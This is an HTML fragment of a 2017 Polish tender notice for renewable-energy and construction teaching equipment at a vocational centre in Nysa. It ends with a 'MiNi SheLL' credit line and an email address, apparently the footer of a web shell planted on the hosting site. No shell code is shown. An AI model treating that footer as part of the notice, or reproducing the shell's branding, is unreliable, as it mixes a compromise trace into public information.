3. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1, w celu wykazania spełniania warunków udziału w postępowaniu lub kryteriów selekcji, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia  art. 36ba ust. 2 ustawy Pzp. 
4. Jeżeli powierzenie podwykonawcy wykonania części zamówienia na usługi następuje w trakcie jego realizacji, wykonawca na żądanie zamawiającego przedstawia oświadczenie, o którym mowa w art. 25a ust. 1, lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy  art. 36ba ust. 1 ustawy Pzp. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zakup, dostawa i montaż wyposażenia do Rozbudowy Centrum Kształcenia Zawodowego i Ustawicznego w Nysie przy ul. Orkana 6 w ramach zadania: Wsparcie kształcenia zawodowego w kluczowych dla regionu branżach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Opis przedmiotu zamówienia.
Przedmiotem zamówienia jest zakup dostawa i  montaż  wyposażenia do  pracowni dydaktycznych w Centrum Kształcenia Zawodowego i Ustawicznego w Nysie

Zamówienie obejmuje równocześnie uruchomienie wraz z instalacją poniżej wskazanych urządzeń i wyposażenia.                   



Symbol grupy lub kategorii CPV: 39162110-9 - Sprzęt dydaktyczny  

Część 1 (zadanie nr 1) -Wyposażenie pracowni odnawialnych źródeł energii

Ogólne założenia
1. Wymagania w zakresie doświadczenia Wykonawcy:
co najmniej dwie dostawy polegającą na dostawie stanowisk dydaktycznych OZE zarządzanych zdalnie z systemem typu SCADA, za kwotę nie mniejszą niż 140 000,00 zł brutto każda, przy czym dostawa musi zawierać co najmniej następujące elementy:
a) stanowisko dydaktyczne z instalacją fotowoltaiczną i turbiną wiatrową
b) stanowisko dydaktyczne z instalacją ciepłej wody użytkowej z kolektorami słonecznymi i pompą ciepła
2. Termin realizacji: (termin podany przez Wykonawce w ofercie ).
3. Szkolenie dotyczące całej pracowni:
Prowadzone u Zamawiającego w miejscu dostarczenia przedmiotu umowy w 2 etapach.
Tematyka szkoleń zaawansowanych, związanych z dostarczonymi stanowiskami ustalona zostanie w porozumieniu z Zamawiającym.
Etap 1  jedno szkolenie podstawowe obejmujące 16h lekcyjnych dla max. 5 osób, po dokonaniu montażu i próbnego uruchomienia stanowisk, w terminie wyznaczonym przez Wykonawcę w ofercie, przeprowadzone przez pracowników Wykonawcy.
Etap 2  jedno szkolenie zaawansowane obejmujące 16h lekcyjnych dla max. 5 osób po dokonaniu montażu i próbnego uruchomienia stanowisk  , w terminie wyznaczonym przez Wykonawcę w ofercie , przeprowadzone przez pracowników Wykonawcy 
4. Gwarancja:  min 24 m-ce 
5. Termin płatności: 30 dni od dostawy i wystawienia faktury  
6. Dostawa, montaż, uruchomienie stanowisk w pracowni nastąpi na koszt Wykonawcy i w uzgodnieniu z Zamawiającym.
7. Stanowiska mają służyć jako wyposażenie dydaktyczne dla kwalifikacji:
-    B.21. Montaż urządzeń i systemów energetyki odnawialnej,
-    B.22. Eksploatacja urządzeń i systemów energetyki odnawialnej.
8. Stanowiska muszą być wyposażone we wszystkie niezbędne elementy przyłączeniowe, montażowe i konstrukcyjne wymagane do pracy.
9. Zamawiający nie dopuszcza składania ofert wariantowych. 
OPIS 

Przedmiot zamówienia został opisany poprzez wskazanie wymagań minimalnych:
1. Stanowisko nr 1: Stanowisko do badania hybrydowego systemu                                        solarno wiatrowego 1 kpl.
Opis:
Stanowisko dydaktyczne powinno utworzyć hybrydowy system solarno-wiatrowy współpracujący z oświetleniem LED. System powinien składać się co najmniej z panelu fotowoltaicznego, turbiny wiatrowej, oświetlenia LED, stacji meteorologicznej oraz dedykowanej instalacji elektrycznej. Instalacja elektryczna może zostać wykonana w wersji 12 V DC lub 24 V DC.
Stanowisko dydaktyczne musi mieć możliwość zarządzania zdalnego za pośrednictwem systemu SCADA dostępnego w pracowni oraz przez sieć Internet.
Minimalne wyposażenie stanowiska:
Elementy montowane poza pracownią:
- Panel fotowoltaiczny monokrystaliczny lub polikrystaliczny dachowy (min. 1 szt) o mocy znamionowej min. 80 W/12V ze stelażem, zamontowany na dachu płaskim  1 kpl.
- Turbina wiatrowa z poziomą lub pionową osią obrotu, min. 100W/12V  1 kpl.
- Zewnętrzne elementy montażowe elektrowni wiatrowej: maszt, linki do stabilizacji, przewody elektryczne  1 kpl.
- Stacja meteorologiczna na dachu budynku współpracująca ze sterownikiem PLC (min. czujnik kierunku i prędkości wiatru, czujnik nasłonecznienia)  1 kpl.
Stanowisko w pracowni:
- Konstrukcja nośna stanowiska dydaktycznego wykonana z profili aluminiowych o wymiarach min. 700 mm x  7000 mm  x 1700 mm 1 kpl.
- Hybrydowy kontroler ładownia (solarno-wiatrowy) współpracujący ze sterownikiem PLC, dopasowany do parametrów turbiny wiatrowej i panelu fotowoltaicznego  1 kpl.
- Akumulator dostosowany do pracy cyklicznej min. 80 Ah/12V (min. 1 szt) umieszczony na mobilnym stojaku/wózku wykonanym z profili aluminiowych oraz materiału zabezpieczającego przed przypadkowym dostępem do akumulatora  1 kpl.
- Inwerter 12 V DC/230 V AC (lub 24 V DC/230 V AC ), typ: czysty sinus, moc dostosowana do wielkości instalacji  1 kpl.
- Szafka sterownicza ze sterownikiem PLC zarządzającym stanowiskiem dydaktycznym (sterownik PLC min. 24 wejścia, 16 wyjść, zasilanie 24 V DC, komunikacja: z systemem SCADA przez Ethernet; z innymi komponentami stanowisk  w dowolnej formie)  1 kpl.
- Oświetlenie elewacyjne LED 12V (lub 24 V) zamontowane w pracowni lub na zewnątrz budynku  min.2 szt.
- Stół  laboratoryjny do stanowiska SCADA 1 szt. ( minimalne wymagania): konstrukcja stołu wykonana z profili aluminiowych o przekroju kwadratowym, blat: płyta meblowa w kolorze srebrnoszarym, wymiary 1600 mm x 800 mm, wymiary całkowite stołu: 1600 mm x 800 mm x 700 mm,4 stopki,
- Elementy montażowe i konstrukcyjne niezbędne wytworzenia instalacji i do prawidłowego funkcjonowania stanowiska w pracowni  1 kpl.
- Wymagana współpraca z systemem SCADA przewidzianym w pracowni,
- Plansza dydaktyczna ze schematem stanowiska,
- Instrukcja użytkownika w języku polskim.
- Dostęp do uzupełniających materiałów dydaktycznych z zakresu OZE na platformie e-learningowej.
- Stanowisko powinno przewidywać możliwość współpracy z kolektorem hybrydowym (część fotowoltaiczna) na stanowisku nr 4.
- Dostawa, uruchomienie i przygotowanie układu do pracy w pracowni w uzgodnieniu z Zamawiającym. 
2. Stanowisko nr 2: Stanowisko do badania  systemu wentylacji mechanicznej z rekuperatorem i gruntowym wymiennikiem ciepła (GWC)-  1 kpl.
Opis:
Stanowisko dydaktyczne powinna tworzyć centrala wentylacyjna (rekuperator z pompą ciepła), instalacja wentylacyjna w pracowni oraz gruntowy wymiennik ciepła (GWC) oraz kontroler stanowiska zrealizowany na przemysłowym sterowniku PLC.
Stanowisko dydaktyczne musi mieć możliwość zarządzania zdalnego za pośrednictwem systemu SCADA dostępnego w pracowni oraz przez sieć Internet.
Minimalne wyposażenie stanowiska:
Elementy montowane poza pracownią:
- Gruntowy wymiennik ciepła GWC: płytowy bezprzeponowy min. 12 płytowy (min. 5,2m x 6,4 m), zamontowany w ziemi na głębokości ok. 0,7-1,5 m, odizolowany warstwą ok. 100 mm styropianu od góry i po bokach; wyznaczenie miejsca montażu po stronie Zamawiającego. Po stronie Wykonawcy przygotowanie terenu i prace ziemne, przejścia przez przegrody , montaż i izolacja GWC wraz z osprzętem pomiarowym   1 kpl.
- Czerpnia powietrza  na zewnątrz budynku, połączona z GWC przewodem o średnicy min.150 mm  1 kpl.
- Wyrzutnia dachowa lub boczna  przewody o średnicy 200 mm   1 kpl.
Stanowisko w pracowni:
-  Rekuperator z pompą ciepła (centrala wentylacyjna)  wentylatory z silnikami EC lub 230 V AC, możliwość obsługi protokołu Modbus lub innego obsługiwanego przez zastosowany sterownik PLC, umożliwiający wentylację powierzchni min. 250 m2, strumień wymieniany  w zakresie. 300-400 m3/h  1 kpl.
-  Konstrukcja nośna stanowiska z profili aluminiowych, wymiary stanowiska umożliwiające swobodny montaż centrali oraz dostęp podczas zajęć dydaktycznych  1 kpl.
- Pomiar temperatury  czujniki temperatury np. Pt 100 lub Pt1000 zamontowane w różnych punktach instalacji dydaktycznej  8 szt. 
- Pomiar przepływu powietrza na wylocie z rekuperatora  1 kpl.
- Wentylacja mechaniczna nawiewno-wywiewna: zamontowana pod sufitem w formie rurociągów podwieszanych (średnica min. 150 mm), zawierająca anemostaty nawiewne i wyciągowe, wykonana w sposób estetyczny i zgodny z zasadami wykonywania tego typu instalacji  1 zestaw
- Szafka sterownicza ze sterownikiem PLC zarządzającym stanowiskiem dydaktycznym (sterownik PLC min. 24 wejścia, 16 wyjść, zasilanie 24 V DC, komunikacja: z systemem SCADA przez Ethernet; z innymi komponentami stanowisk  w dowolnej formie)  1 kpl.
- Stół  laboratoryjny do stanowiska SCADA 1 szt. ( minimalne wymagania): konstrukcja stołu wykonana z profili aluminiowych o przekroju kwadratowym, blat: płyta meblowa w kolorze srebrnoszarym, wymiary 1600 mm x 800 mm, wymiary całkowite stołu: 1600 mm x 800 mm x 700 mm,4 stopki,
-Elementy montażowe i konstrukcyjne niezbędne wytworzenia instalacji i do prawidłowego funkcjonowania stanowiska w pracowni  1 kpl.
- Wymagana współpraca z systemem SCADA przewidzianym w pracowni,
- Plansza dydaktyczna ze schematem stanowiska,
- Dostęp do uzupełniających materiałów dydaktycznych z zakresu OZE na platformie e-learningowej.
- Instrukcja użytkownika w języku polskim.
- Dostawa, uruchomienie i przygotowanie układu do pracy w pracowni w uzgodnieniu z Zamawiającym 
3. Stanowisko nr 3: Stanowisko do badania  instalacja ciepłej wody użytkowej z kolektorem próżniowym i pompą ciepła powietrze-woda   1 kpl.
Opis:
Stanowisko dydaktyczne powinien tworzyć system solarny składający się z kolektora próżniowo-rurowego zamontowanego na dachu płaskim (min. 10 rur próżniowych) , zbiornika ciepłej wody użytkowej o pojemności min 200 l  zintegrowanego z pompą ciepła, zespołu solarno-pompowego, sterownika solarnego oraz kontrolera stanowiska zrealizowanego na przemysłowym sterowniku PLC.
Stanowisko dydaktyczne powinno być wyposażone w następującą aparaturę pomiarową:
- ciepłomierze, które umożliwiają uzyskanie informacji takich jak przepływ i temperatury cieczy, moc oraz przekazana energia w określonym punkcie instalacji.
- licznik energii elektrycznej pozwalający na pomiar zużycia energii elektrycznej przez sprężarkę pompy ciepła oraz grzałkę elektryczną w zbiorniku.
- czujniki temperatury (zbiornik c.w.u. oraz kolektor próżniowo-rurowy),
Stanowisko dydaktyczne musi mieć możliwość zarządzania zdalnego za pośrednictwem systemu SCADA dostępnego w pracowni oraz przez sieć Internet. 

Minimalne wyposażenie stanowiska:
Elementy montowane poza pracownią:
- Kolektor słoneczny próżniowo- rurowy (min. 10 rur próżniowych)  1 kpl.
-Stelaż montażowy kolektora na dach płaski, kąt nachylenia ok. 45°  1 kpl.
Stanowisko w pracowni:
- Konstrukcja nośna stanowiska dydaktycznego wykonana z profili aluminiowych o wymiarach min.700 mm x 1100 mm x 1700 mm  1 kpl.
- Szafka sterownicza ze sterownikiem PLC zarządzającym stanowiskiem dydaktycznym (sterownik PLC min. 24 wejścia, 16 wyjść, zasilanie 24 V DC, komunikacja: z systemem SCADA przez Ethernet; z innymi komponentami stanowisk  w dowolnej formie)  1 kpl.
- Zbiornik c.w.u z pompą ciepła o pojemności min. 200 l z pojedynczą lub podwójną wężownicą
i grzałką elektryczną o mocy min. 1 kW  1 kpl.
- Naczynie wyrównawcze zbiornika c.w.u.  1 kpl.
- Grupa solarno-pompowa dopasowana do parametrów instalacji  1 kpl.
- Regulator/sterownik solarny  1 kpl.
- Solarne naczynie przeponowe o pojemności i ciśnieniu pracy dopasowanym do parametrów instalacji  1 kpl.
- Układ pompy recyrkulacyjnej c.w.u.  1 kpl.
- Układ odbioru nadmiaru ciepła w instalacji w okresie bez zajęć dydaktycznych  1 kpl.
- Elementy systemu połączeniowego dla kolektora, pompy ciepła, grupy solarno-pompowej, zbiornika itd.  1 kpl.
- Płyn solarny (np. glikol propylenowy)  1 kpl.
- Aparatura pomiarowa współpracująca z systemem SCADA:
- ciepłomierze z czujnikami temperatury np. Pt100, Pt500,  lub Pt1000 lub inny  2 kpl.
- licznik energii elektrycznej  1 szt.
- Czujniki temperatury np. Pt100, Pt500, Pt1000 lub inny w instalacji solarnej (zbiornik cwu (1 szt.) ; kolektor płaski (1 szt.)  2 kpl.
- Stół  laboratoryjny do stanowiska SCADA 1 szt. ( minimalne wymagania): konstrukcja stołu wykonana z profili aluminiowych o przekroju kwadratowym, blat: płyta meblowa w kolorze srebrnoszarym, wymiary 1600 mm x 800 mm, wymiary całkowite stołu: 1600 mm x 800 mm x 700 mm,4 stopki,
- Elementy montażowe i konstrukcyjne niezbędne wytworzenia instalacji i do prawidłowego funkcjonowania stanowiska w pracowni  1 kpl.
- Wymagana współpraca z systemem SCADA przewidzianym w pracowni,
- Plansza dydaktyczna ze schematem stanowiska,
- Instrukcja użytkownika w języku polskim.
- Dostęp do uzupełniających materiałów dydaktycznych z zakresu OZE na platformie e-learningowej.
- Dostawa, uruchomienie i przygotowanie układu do pracy w pracowni w uzgodnieniu z Zamawiającym. 
4. Stanowisko nr 4: Stanowisko do badania  kolektora płaskiego hybrydowego PVT zasilającego instalację CWU  1 kpl.
Opis:
Stanowisko dydaktyczne powinien tworzyć system solarny składający się z kolektora płaskiego zamontowanego na dachu płaskim/skośnym, zbiornika ciepłej wody użytkowej, zespołu solarno-pompowego, sterownika solarnego oraz kontrolera stanowiska zrealizowanego na przemysłowym sterowniku PLC.
Stanowisko dydaktyczne powinno być wyposażone w następującą aparaturę pomiarową:
- ciepłomierze, które umożliwiają uzyskanie informacji takich jak przepływ  i temperatury cieczy, moc oraz przekazana energia w określonym punkcie instalacji,
- licznik energii elektrycznej pozwalający na pomiar zużycia energii elektrycznej przez grzałkę elektryczną w zbiorniku,
- czujniki temperatury (zbiornik c.w.u. oraz kolektor płaski),
Stanowisko dydaktyczne musi mieć możliwość zarządzania zdalnego za pośrednictwem systemu SCADA dostępnego w pracowni oraz przez sieć Internet. 
Minimalne wyposażenie stanowiska:
Elementy montowane poza pracownią:
- Kolektor słoneczny płaski hybrydowy PVT: parametry termiczne powierzchnia całkowita min. 1,3m2, moc szczytowa kolektora min. 600 W, parametry elektryczne: moc szczytowa min. 150 W  1 kpl.
- Stelaż montażowy na dach płaski, kąt nachylenia kolektora płaskiego wynosi 45°  1 kpl.
Stanowisko w pracowni:
- Konstrukcja nośna stanowiska dydaktycznego wykonana z profili aluminiowych o wymiarach min.700 mm x 1100 mm x 1700 mm  1 kpl.
- Szafka sterownicza ze sterownikiem PLC zarządzającym stanowiskiem dydaktycznym (sterownik PLC min. 24 wejścia, 16 wyjść, zasilanie 24 V DC, komunikacja: z systemem SCADA przez Ethernet; z innymi komponentami stanowisk  w dowolnej formie)  1 kpl.
- Zbiornik c.w.u o pojemności min. 200 l z pojedynczą lub podwójną wężownicą i grzałką elektryczną o mocy min. 1 kW  1 kpl.
- Naczynie wyrównawcze zbiornika c.w.u.  1 kpl.
- Grupa solarno-pompowa dopasowana do parametrów instalacji  1 kpl.
- Regulator/sterownik solarny  1 kpl.
- Solarne naczynie przeponowe o pojemności i ciśnieniu pracy dopasowanym do parametrów instalacji  1 kpl.
- Układ pompy recyrkulacyjnej c.w.u.  1 kpl.
- Układ odbioru nadmiaru ciepła w instalacji w okresie bez zajęć dydaktycznych  1 kpl.
- Elementy systemu połączeniowego dla kolektora, pompy ciepła, grupy solarno-pompowej, zbiornika itd.  1 kpl.
- Płyn solarny (np. glikol propylenowy)  1 kpl.
- Aparatura pomiarowa współpracująca z systemem SCADA:
- Ciepłomierze z czujnikami temperatury np. Pt100, Pt500, Pt1000 lub inny  2 kpl.
-  Licznik energii elektrycznej  1szt.
- Czujniki temperatury np. Pt100, Pt500, Pt1000 lub inny w instalacji solarnej (zbiornik cwu (1 szt.) ; kolektor płaski (1 szt.)  2 kpl.
- Elementy montażowe i konstrukcyjne niezbędne wytworzenia instalacji i do prawidłowego funkcjonowania stanowiska w pracowni  1 kpl.
- Kolektor hybrydowy (część fotowoltaiczna) powinien współpracować ze stanowiskiem nr 1
- Stół  laboratoryjny do stanowiska SCADA 1 szt. ( minimalne wymagania): konstrukcja stołu wykonana z profili aluminiowych o przekroju kwadratowym, blat: płyta meblowa w kolorze srebrnoszarym, wymiary 1600 mm x 800 mm, wymiary całkowite stołu: 1600 mm x 800 mm x 700 mm,4 stopki,
- Wymagana współpraca z systemem SCADA przewidzianym w pracowni,
- Plansza dydaktyczna ze schematem stanowiska,
- Instrukcja użytkownika w języku polskim.
- Dostęp do uzupełniających materiałów dydaktycznych z zakresu OZE na platformie e-learningowej.
- Dostawa, uruchomienie i przygotowanie układu do pracy w pracowni w uzgodnieniu z Zamawiającym 
5. Stanowisko nr 5: System SCADA do centralnego sterowania i nadzoru stanowisk dydaktycznych w pracowni OZE  1 kpl.
Opis:
SCADA w pracowni OZE  wymagania dotyczące realizacji systemu informatycznego w pracowni:

- Praca ciągła systemu 24/7,
- Praca podstawowych urządzeń sterujących i wykonawczych jest niezależna od systemu nadzorującego (SCADA),
- Obsługa stanowisk dydaktycznych z poz. 1-4 
- Akwizycja danych pomiarowych:
- Komunikacja ethernetowa ze sterownikami PLC i aparaturą pomiarową,
- Interfejs użytkownika, umożliwiający prezentację pracy systemu wraz z danymi archiwalnymi oraz umożliwiający kontrolę jego pracy,
- Interfejs użytkownika (administracyjny oraz kliencki) dostępny przez przeglądarkę internetową,
- Możliwość integracji w przyszłości dodatkowych stanowisk,
- Licencja oprogramowania SCADA nie może ograniczać możliwości rozbudowy systemu, czynności administracyjnych oraz liczby równoczesnego dostępu wielu użytkowników.

Minimalne wyposażenie stanowiska:
- Serwer danych: klasy PC, minimum dwa dyski twarde o pojemności umożliwiającej prawidłową pracę systemu z archiwizacją danych pomiarowych przez minimum 5 lat i pracujące w układzie z kontrolą parzystości; pamięć ram ECC lub ECC-R  1 szt.
- Zasilacz UPS: zapewniający minimum 30 minut podtrzymania bateryjnego i automatyczne zamknięcie systemu w przypadku rozładowania akumulatorów  1 szt.
- Szafa rack: zamykana, uniemożliwiająca dostęp do serwera danych osobom nieuprawnionym  1 szt.
- Stół  laboratoryjny do stanowiska SCADA 1 szt. ( minimalne wymagania): konstrukcja stołu wykonana z profili aluminiowych o przekroju kwadratowym, blat: płyta meblowa w kolorze srebrnoszarym, wymiary 1600 mm x 800 mm, wymiary całkowite stołu: 1600 mm x 800 mm x 700 mm,4 stopki,
- Oprogramowanie SCADA z licencją umożliwiającą swobodną rozbudowę systemu w przyszłości  1 szt.
- Infrastruktura sieciowa łącząca stanowiska dydaktyczne  1 kpl.
- Instrukcja użytkownika w języku polskim  1 kpl.
6. Zestawy komputerowe do stanowisk SCADA  5 kpl.
Wymagania minimalne:
- Procesor  wydajność minimum 2000 wg passmark
- Płyta główna  dopasowana do zestawu, obsługa SATA3, obsługa USB3
- Pamięć ram  minimum 8GB
- Dysk  typu SSD, minimum 120GB, SATA3
- Karta graficzna  zintegrowana, wyjścia minimum 1 szt. VGA oraz 1 szt. HDMI
- Karta sieciowa  zintegrowana, zgodna z 1000BASE-T
 - Karta dźwiękowa  zintegrowana
- Napęd optyczny  możliwość odczytu płyt CD i DVD
- Obudowa  dopasowana do zestawu
- Zasilacz  moc minimum 300W, certyfikat sprawności min. 80+bronze
- System operacyjny - 64-bitowy, j. polski, Windows 7 home premium lub Windows 8.1 home lub Windows 10 home, licencja OEM
- Klawiatura i mysz  pasująca do zestawu
- Monitor  FullHD, przekątna minimum 21 cali, wbudowane głośniki, złącza: min 1 szt. VGA, min. 1 szt, HDMI.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zakup, dostawa i montaż wyposażenia do Rozbudowy Centrum Kształcenia Zawodowego i Ustawicznego w Nysie przy ul. Orkana 6 w ramach zadania: Wsparcie kształcenia zawodowego w kluczowych dla regionu branżach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2 (zadanie nr 2 )Wyposażenie pracowni budowlanych 

Przedmiotem zamówienia jest zakup dostawa i  montaż  wyposażenia do  pracowni dydaktycznych w Centrum Kształcenia Zawodowego i Ustawicznego w Nysie

Zamawiający w niniejszym  postępowaniu składania ofert częściowych, w związku                        z powyższym Zamawiający podzielił zamówienie na 2 (dwie) części ( zadania) określone szczegółowo poniżej w niniejszej SIWZ.  

CPV 39162110-9 - Sprzęt dydaktyczny, 43830000-0  Narzędzia ręczne z napędem mechanicznym, 43300000-6  Maszyny i sprzęt budowlany.                         

 

Ogólne założenia

1. Termin realizacji: (termin podany przez Wykonawce w ofercie ).
2. Gwarancja: min 24 m-ce 
3. Termin płatności: 30 dni od dostawy i wystawienia faktury  
4. Dostawa, urządzeń, sprzętu do pracowni budowlanych nastąpi na koszt Wykonawcy i w uzgodnieniu z Zamawiającym.
5. Zamawiający nie dopuszcza składania ofert wariantowych. 
OPIS 
Przedmiot zamówienia został opisany poprzez wskazanie wymagań minimalnych:
1. Stoły  warsztatowe  32 szt.
Opis/ wymagania minimalne : konstrukcja stołu ze stalowych profili 60 x 60 mm śrubowane metalowe nóżki do wyrównywania nierówności roboczy blat stołu grubości 40 mm ze szczególnie trwałym pokryciem w kolorze czarnym np.  ze sklejki antypoślizgowej wodoodpornej (gładką powierzchnią do góry) ,maksymalne obciążenie blatu roboczego 1000 kg
 długość stołu  2100 mm, głębokość stołu 750 mm, wysokość 800 mm
2. Taborety warsztatowe 64 szt.
Opis/ wymagania minimalne : Stalowa podstawa na stopkach.
(Konstrukcja stalowa)
Regulacja wysokości pneumatyczna Wysokość siedziska regulowana za pomocą siłownika pneumatycznego
(Stopki)
Siedzisko drewniane z oparciem profilowane  obrotowe wokół własnej osi 
Oparcie 
Nośność krzesła 110 kg 
3. Szafka ubraniowa 4 szt. 
Opis/ wymagania minimalne : konstrukcja stalowa , cokół o wysokości 100mm, drzwi z profilem wzmacniającym, osadzone na ukrytych zawiasach, na drzwiach otwory wentylacyjne oraz ramka na etykietę, 
Wnętrze produktu: w każdej komorze półka i drążek z przesuwanymi wieszakami 
Zamknięcie: drzwi zamykane zamkiem cylindrycznym , do każdego zamka dwa klucze w komplecie, zamek w systemie klucza master
Wymiary: wysokość 1800mm, szerokość 610mm, głębokość 480mm 
4.  Biurko warsztatowe  4 szt.
Opis/ wymagania minimalne: konstrukcja wykonana z wysokiej jakości profili zamkniętych o przekroju kwadratowym, łatwość poziomowania dzięki stópkom regulacyjnym, blat -  płyta laminowana  o podwyższonej odporności na ścieranie o grubości 25mm zabezpieczony listwa zabezpieczającą 
Wymiary: wysokość 750mm, szerokość 2005mm, głębokość 750mm 
Wyposażenie dwie szafki  pod blatem 
5. Regał warsztatowy 8 szt.
Opis/ wymagania minimalne:
Wysokość regału mini 1800 mm
Szerokość min 900 mm
Głębokość min 500 mm
Ilość półek 5 szt  z płyty meblowej laminowana o podwyższonej twardości i  odporności na ścieranie o grubości min 22 mm 

Obciążalność (nośność) półki  250 kg 
Rama stalowa malowana/ocynkowana.
Regał zaczepowy (montaż bez śrub)
6. Rusztowanie aluminiowe  6 szt.
Opis/ wymagania minimalne:
Rodzaj rusztowania ; aluminiowe rurowe jezdne - koła z antypoślizgową gumową powłoką
Wymiar rusztowania: 1,35 x 1,85m
Wys. rusztowania 2,00m
Wys. robocza 3,00m
Maksymalne obciążenie na pomost min. 250 kg
7. Drabina rozkładana aluminiowa  6 szt.
Opis/ wymagania minimalne:
Drabina wielofunkcyjna 3 elementowa.
Maksymalne obciążenie wynosi 150 kg.
Długość drabiny złożonej 3,10 m
Długość robocza drabiny rozłożonej  7,65 m
Długość robocza w podparciu 4,8 m
Przekrój profilu bocznego min 77x25 mm
8. Wiertarka udarowa ręczna  6 szt.
Opis/ wymagania minimalne:
Typ uchwytu  sds ( z możliwością wymiany na samozaciskowy)  
Średnica wiercenia min 13 mm
3 rodzaje pracy  wiercenie, wiercenie z udarem , kucie 
Regulacja obrotów 
Zmiana kierunków obrotów 
Moc min -750 W
uchwyt samozaciskowy typ sds
9. Mieszadło warsztatowe do kleju  6 szt. (Mieszarka elektryczna)
Opis/ wymagania minimalne:
Do mieszania materiałów budowlanych o średniej i wysokiej lepkości (m in. kleju)
Moc:  min 1500 W
Max masa mieszanej substancji: 75 kg 
Ilość biegów: min  2 - wolnoobrotowe z miękkim startem

10. Waga elektroniczna do 30 kg  6 szt.
Opis/ wymagania minimalne:
 typ wieszakowy
- wyświetlacz  cyfrowy
- Szala wagi ze stali szlachetnej
11. Szlifierka kątowa   6 szt.
Opis/ wymagania minimalne:
Moc min 750 W , średnica tarczy min125 mm, regulowane obroty,  bez narzędziowy system  mocowania  tarczy
12. Wiertarko -wkrętarka akumulatorowa z oprzyrządowaniem     6 szt.
Opis/ wymagania minimalne:
Napięcie akumulatora (V) min 14
Rodzaj akumulatora  litowo- jonowy
Pojemność akumulatora (ah) min -2
Ilość akumulatorów w zestawie - 2  
Ilość prędkości obrotowych            2    
Ładowarka                                     2
Rodzaj uchwytu  samozaciskowy
Wbudowana dioda podświetlająca miejsce pracy
Walizka z kompletem bitów<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162110-9, 43830000-0,
                    43300000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com